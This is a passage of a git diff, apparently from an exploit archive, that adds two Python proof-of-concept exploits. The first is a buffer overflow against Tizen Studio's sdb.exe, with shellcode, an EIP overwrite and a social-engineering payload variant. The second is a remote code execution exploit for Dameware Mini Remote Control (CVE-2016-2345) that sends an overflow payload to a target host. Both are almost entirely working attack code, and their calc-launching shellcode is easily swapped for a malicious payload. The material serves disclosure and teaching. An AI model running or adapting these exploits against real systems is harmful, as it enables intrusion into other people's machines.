+# 28/Jul/16 - Got suggestion from CL to inform Tizen Mobile project
+# 29/Jul/16 - Moved the issue to Tizen Mobile project
+# - NO RESPONSE -
+# 7/Sep/16 - Escalated through Samsung security contact (BZ)
+# 14/Nov/16 - Got informed by BZ that HQ is dealing with the issue with no further details
+# - NO RESPONSE -
+# 02/Oct/17 - Tizen Mobile project has been informed about plans to release PoC on exploit-db
+# - NO RESPONSE -
+# 22/Oct/17 - The PoC submitted to exploit-db
+
+
+import struct
+import subprocess
+import sys
+
+ARGS = " launch A A A A A "
+
+
+def tech_direct_exec(sdb_path):
+    # msfvenom -a x86 --platform Windows -p windows/exec CMD=calc -e x86/shikata_ga_nai \
+    # -b '\x00\x20\x0a\x0d\x1b\x0b\x0c' -f python
+    buf = ""
+    buf += "\xb8\xb6\x98\xe6\xfa\xdb\xcb\xd9\x74\x24\xf4\x5b\x31"
+    buf += "\xc9\xb1\x30\x31\x43\x13\x83\xeb\xfc\x03\x43\xb9\x7a"
+    buf += "\x13\x06\x2d\xf8\xdc\xf7\xad\x9d\x55\x12\x9c\x9d\x02"
+    buf += "\x56\x8e\x2d\x40\x3a\x22\xc5\x04\xaf\xb1\xab\x80\xc0"
+    buf += "\x72\x01\xf7\xef\x83\x3a\xcb\x6e\x07\x41\x18\x51\x36"
+    buf += "\x8a\x6d\x90\x7f\xf7\x9c\xc0\x28\x73\x32\xf5\x5d\xc9"
+    buf += "\x8f\x7e\x2d\xdf\x97\x63\xe5\xde\xb6\x35\x7e\xb9\x18"
+    buf += "\xb7\x53\xb1\x10\xaf\xb0\xfc\xeb\x44\x02\x8a\xed\x8c"
+    buf += "\x5b\x73\x41\xf1\x54\x86\x9b\x35\x52\x79\xee\x4f\xa1"
+    buf += "\x04\xe9\x8b\xd8\xd2\x7c\x08\x7a\x90\x27\xf4\x7b\x75"
+    buf += "\xb1\x7f\x77\x32\xb5\xd8\x9b\xc5\x1a\x53\xa7\x4e\x9d"
+    buf += "\xb4\x2e\x14\xba\x10\x6b\xce\xa3\x01\xd1\xa1\xdc\x52"
+    buf += "\xba\x1e\x79\x18\x56\x4a\xf0\x43\x3c\x8d\x86\xf9\x72"
+    buf += "\x8d\x98\x01\x22\xe6\xa9\x8a\xad\x71\x36\x59\x8a\x8e"
+    buf += "\x7c\xc0\xba\x06\xd9\x90\xff\x4a\xda\x4e\xc3\x72\x59"
+    buf += "\x7b\xbb\x80\x41\x0e\xbe\xcd\xc5\xe2\xb2\x5e\xa0\x04"
+    buf += "\x61\x5e\xe1\x66\xe4\xcc\x69\x69"
+
+    stack_adj = "\x83\xEC\x7F" * 2  # SUB ESP,0x7F - stack adjustment
+    sc = stack_adj + buf
+
+    eip = "\x01\xed\x8b"  # 008BED01 - 3 byte EIP overwrite
+    payload = "B" * 2000 + "\x90" * (2086 - len(sc) - 1) + "\x90" + sc + eip
+
+    print "Trying to exploit the binary... "
+    print "Payload length: " + str(len(payload))
+    print sdb_path + ARGS + payload
+
+    subprocess.Popen([sdb_path, "launch", "A", "A", "A", "A", "A", payload], stdout=subprocess.PIPE)
+
+
+def tech_social_ascii(sdb_path, jmp_esp_addr):
+    eip = struct.pack('<L', int(jmp_esp_addr, 0))
+    # msfvenom -a x86 --platform Windows -p windows/exec CMD=calc -e x86/alpha_mixed BufferRegister=ESP -f python
+    buf = ""
+    buf += "\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
+    buf += "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30"
+    buf += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42"
+    buf += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
+    buf += "\x6b\x4c\x4d\x38\x4e\x62\x77\x70\x63\x30\x35\x50\x71"
+    buf += "\x70\x6f\x79\x79\x75\x50\x31\x69\x50\x62\x44\x6c\x4b"
+    buf += "\x32\x70\x34\x70\x6e\x6b\x76\x32\x36\x6c\x6c\x4b\x63"
+    buf += "\x62\x45\x44\x6e\x6b\x61\x62\x37\x58\x76\x6f\x6f\x47"
+    buf += "\x70\x4a\x51\x36\x44\x71\x69\x6f\x4c\x6c\x45\x6c\x55"
+    buf += "\x31\x61\x6c\x36\x62\x54\x6c\x47\x50\x39\x51\x78\x4f"
+    buf += "\x74\x4d\x67\x71\x69\x57\x68\x62\x6b\x42\x36\x32\x53"
+    buf += "\x67\x4c\x4b\x61\x42\x52\x30\x6c\x4b\x31\x5a\x67\x4c"
+    buf += "\x4e\x6b\x32\x6c\x57\x61\x53\x48\x59\x73\x62\x68\x67"
+    buf += "\x71\x48\x51\x36\x31\x6c\x4b\x31\x49\x47\x50\x35\x51"
+    buf += "\x38\x53\x6e\x6b\x30\x49\x55\x48\x68\x63\x34\x7a\x31"
+    buf += "\x59\x4c\x4b\x50\x34\x6c\x4b\x33\x31\x5a\x76\x70\x31"
+    buf += "\x6b\x4f\x6c\x6c\x79\x51\x78\x4f\x46\x6d\x35\x51\x58"
+    buf += "\x47\x50\x38\x39\x70\x70\x75\x79\x66\x64\x43\x43\x4d"
+    buf += "\x4c\x38\x55\x6b\x63\x4d\x61\x34\x70\x75\x6d\x34\x72"
+    buf += "\x78\x4e\x6b\x61\x48\x45\x74\x47\x71\x78\x53\x72\x46"
+    buf += "\x6c\x4b\x44\x4c\x62\x6b\x4c\x4b\x51\x48\x35\x4c\x43"
+    buf += "\x31\x69\x43\x6c\x4b\x67\x74\x4e\x6b\x55\x51\x6e\x30"
+    buf += "\x6b\x39\x50\x44\x65\x74\x37\x54\x53\x6b\x63\x6b\x73"
+    buf += "\x51\x72\x79\x71\x4a\x72\x71\x4b\x4f\x59\x70\x43\x6f"
+    buf += "\x33\x6f\x32\x7a\x4e\x6b\x62\x32\x5a\x4b\x4e\x6d\x51"
+    buf += "\x4d\x32\x4a\x65\x51\x6e\x6d\x6b\x35\x6e\x52\x55\x50"
+    buf += "\x73\x30\x63\x30\x46\x30\x30\x68\x55\x61\x4c\x4b\x52"
+    buf += "\x4f\x4f\x77\x69\x6f\x5a\x75\x4d\x6b\x6c\x30\x6f\x45"
+    buf += "\x4c\x62\x53\x66\x30\x68\x79\x36\x4a\x35\x4d\x6d\x6f"
+    buf += "\x6d\x6b\x4f\x39\x45\x75\x6c\x55\x56\x53\x4c\x56\x6a"
+    buf += "\x6b\x30\x39\x6b\x6b\x50\x64\x35\x76\x65\x4d\x6b\x32"
+    buf += "\x67\x42\x33\x62\x52\x32\x4f\x71\x7a\x45\x50\x31\x43"
+    buf += "\x69\x6f\x6e\x35\x61\x73\x31\x71\x52\x4c\x73\x53\x75"
+    buf += "\x50\x41\x41"
+
+    stack_adj = "\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A"
+    stack_adj += "\x2d\x66\x4f\x66\x47\x2d\x4c\x31\x4c\x36\x2d\x67\x39\x6a\x2a\x2d\x57\x57\x57\x57\x50"
+    stack_adj += "\x50\x5C" + "A" * 4
+    ascii_nop_sleed = "C" * 70
+    payload = sdb_path + ARGS + "A" * 4086 + eip + "\x77\x21\x42\x42\x20" + ascii_nop_sleed + stack_adj + buf
+    print "Now sdb.exe user could be asked to run the following code from cmd line:"
+    print payload
+    f = open("sdb_poc.txt", 'w')
+    f.write(payload)
+    f.close()
+    print "The payload has been also saved to sdb_poc.txt file for your convenience"
+
+
+def bonus_exercise():
+    print """Can you spot the bug here?
+    
+int launch_app(int argc, char** argv)
+{
+	static const char *const SHELL_LAUNCH_CMD = "shell:/usr/bin/sdk_launch_app ";
+	char full_cmd[4096];
+	int i;
+	
+	snprintf(full_cmd, sizeof full_cmd, "%s", SHELL_LAUNCH_CMD);
+
+	for (i=1 ; i<argc ; i++) {
+		strncat(full_cmd, " ", sizeof(full_cmd)-strlen(" ")-1);
+		strncat(full_cmd, argv[i], sizeof(full_cmd)-strlen(argv[i])-1);
+	}
+}       
+"""
+
+
+def usage():
+    print """Smart Development Bridge <=2.3.2 (part of Tizen Studio 1.3 Windows x86/x64) - Buffer Overflow PoC
+by Marcin Kopec <m a r c i n \. k o p e c @ h o t m a i l . c o m>
+
+Demonstrated Exploitation Techniques: 
+1: Direct execution, 3-byte EIP overwrite, Stack adjustment
+2: Payload for social engineering attack, JMP ESP (!mona find -s "\\xff\\xe4" -cp alphanum), Alphanumeric shellcode
+3: Bonus exercise - source code analysis
+
+This code has been created for educational purposes only, to raise awareness on software security, and it's harmless 
+by intention (the PoC runs calc.exe). Please do not change the code behaviour to malicious
+
+Usage: python sdbBOpoc.py [Technique_ID] [Path_to_sdb.exe] [Address_of_JMP_ESP]
+Examples: python sdbBOpoc.py 1 C:\Tizen\Tools\sdb.exe
+          python sdbBOpoc.py 2 C:\Tizen\Tools\sdb.exe 0x76476557
+          python sdbBOpoc.py 3"""
+
+
+def main():
+    if len(sys.argv) > 1:
+        if int(sys.argv[1]) == 1:
+            if len(sys.argv) == 3:
+                tech_direct_exec(sys.argv[2])
+        if int(sys.argv[1]) == 2:
+            if len(sys.argv) == 4:
+                tech_social_ascii(sys.argv[2], sys.argv[3])
+        if int(sys.argv[1]) == 3:
+            bonus_exercise()
+    else:
+        usage()
+
+
+if __name__ == '__main__':
+    main()
diff --git a/platforms/windows/remote/43059.py b/platforms/windows/remote/43059.py
new file mode 100755
index 000000000..d23f4cbb9
--- /dev/null
+++ b/platforms/windows/remote/43059.py
@@ -0,0 +1,79 @@
+# Exploit Title: Dameware Remote Controller RCE
+# Date: 3-04-2016
+# Exploit Author: Securifera
+# Vendor Homepage: http://www.dameware.com/products/mini-remote-control/product-overview.aspx
+# Version: 12.0.0.520
+# Website: https://www.securifera.com/blog/2016/04/03/fun-with-remote-controllers-dameware-mini-remote-control-cve-2016-2345/
+# CVE : CVE-2016-2345
+
+import socket
+import sys
+import os
+import time
+import struct
+import binascii
+import random
+
+# windows/exec - 220 bytes
+# http://www.metasploit.com
+# Encoder: x86/shikata_ga_nai
+# VERBOSE=false, PrependMigrate=false, EXITFUNC=process,
+# CMD=calc.exe
+sc = ""
+sc += "\xba\x01\xa8\x4f\x9e\xd9\xca\xd9\x74\x24\xf4\x5e\x29"
+sc += "\xc9\xb1\x31\x31\x56\x13\x03\x56\x13\x83\xee\xfd\x4a"
+sc += "\xba\x62\x15\x08\x45\x9b\xe5\x6d\xcf\x7e\xd4\xad\xab"
+sc += "\x0b\x46\x1e\xbf\x5e\x6a\xd5\xed\x4a\xf9\x9b\x39\x7c"
+sc += "\x4a\x11\x1c\xb3\x4b\x0a\x5c\xd2\xcf\x51\xb1\x34\xee"
+sc += "\x99\xc4\x35\x37\xc7\x25\x67\xe0\x83\x98\x98\x85\xde"
+sc += "\x20\x12\xd5\xcf\x20\xc7\xad\xee\x01\x56\xa6\xa8\x81"
+sc += "\x58\x6b\xc1\x8b\x42\x68\xec\x42\xf8\x5a\x9a\x54\x28"
+sc += "\x93\x63\xfa\x15\x1c\x96\x02\x51\x9a\x49\x71\xab\xd9"
+sc += "\xf4\x82\x68\xa0\x22\x06\x6b\x02\xa0\xb0\x57\xb3\x65"
+sc += "\x26\x13\xbf\xc2\x2c\x7b\xa3\xd5\xe1\xf7\xdf\x5e\x04"
+sc += "\xd8\x56\x24\x23\xfc\x33\xfe\x4a\xa5\x99\x51\x72\xb5"
+sc += "\x42\x0d\xd6\xbd\x6e\x5a\x6b\x9c\xe4\x9d\xf9\x9a\x4a"
+sc += "\x9d\x01\xa5\xfa\xf6\x30\x2e\x95\x81\xcc\xe5\xd2\x7e"
+sc += "\x87\xa4\x72\x17\x4e\x3d\xc7\x7a\x71\xeb\x0b\x83\xf2"
+sc += "\x1e\xf3\x70\xea\x6a\xf6\x3d\xac\x87\x8a\x2e\x59\xa8"
+sc += "\x39\x4e\x48\xcb\xdc\xdc\x10\x22\x7b\x65\xb2\x3a"
+
+port = 6129
+
+if len (sys.argv) == 2:
+ (progname, host ) = sys.argv
+else:
+ print len (sys.argv)
+ print 'Usage: {0} host'.format (sys.argv[0])
+ exit (1)
+
+csock = socket.socket( socket.AF_INET, socket.SOCK_STREAM)
+csock.connect ( (host, int(port)) )
+
+type = 444.0
+buf = struct.pack("I", 4400 ) #Init Version
+buf += "\xcc"*4
+buf += struct.pack("d", type) #Minor Version
+buf += struct.pack("d", type) #Minor Version
+buf += (40 - len(buf)) * "C"
+csock.send(buf)
+
+wstr = "\x90" * 0x10 #nop sled
+wstr += sc #calc shellcode
+wstr += "\x90" * (0x2ac - 0x10 - len(sc))
+wstr += "\xeb\x06\xff\xff" #short jump forward
+wstr += struct.pack("I", 0x00401161 ) #pop pop return gadget
+wstr += "\x90" * 3 #nop
+wstr += "\xe9\x6b\xfa\xff\xff" #short jump back to shellcode
+wstr += "E" * 0xbc
+wstr += ("%" + "\x00" + "c" + "\x00")*5
+
+buf = struct.pack("I", 0x9c44) #msg type
+buf += wstr #payload
+buf += "\x00" * (0x200) #null bytes
+csock.send(buf)
+
+print binascii.hexlify(csock.recv(0x4000)) #necessary reads
+print binascii.hexlify(csock.recv(0x4000))
+
+csock.close()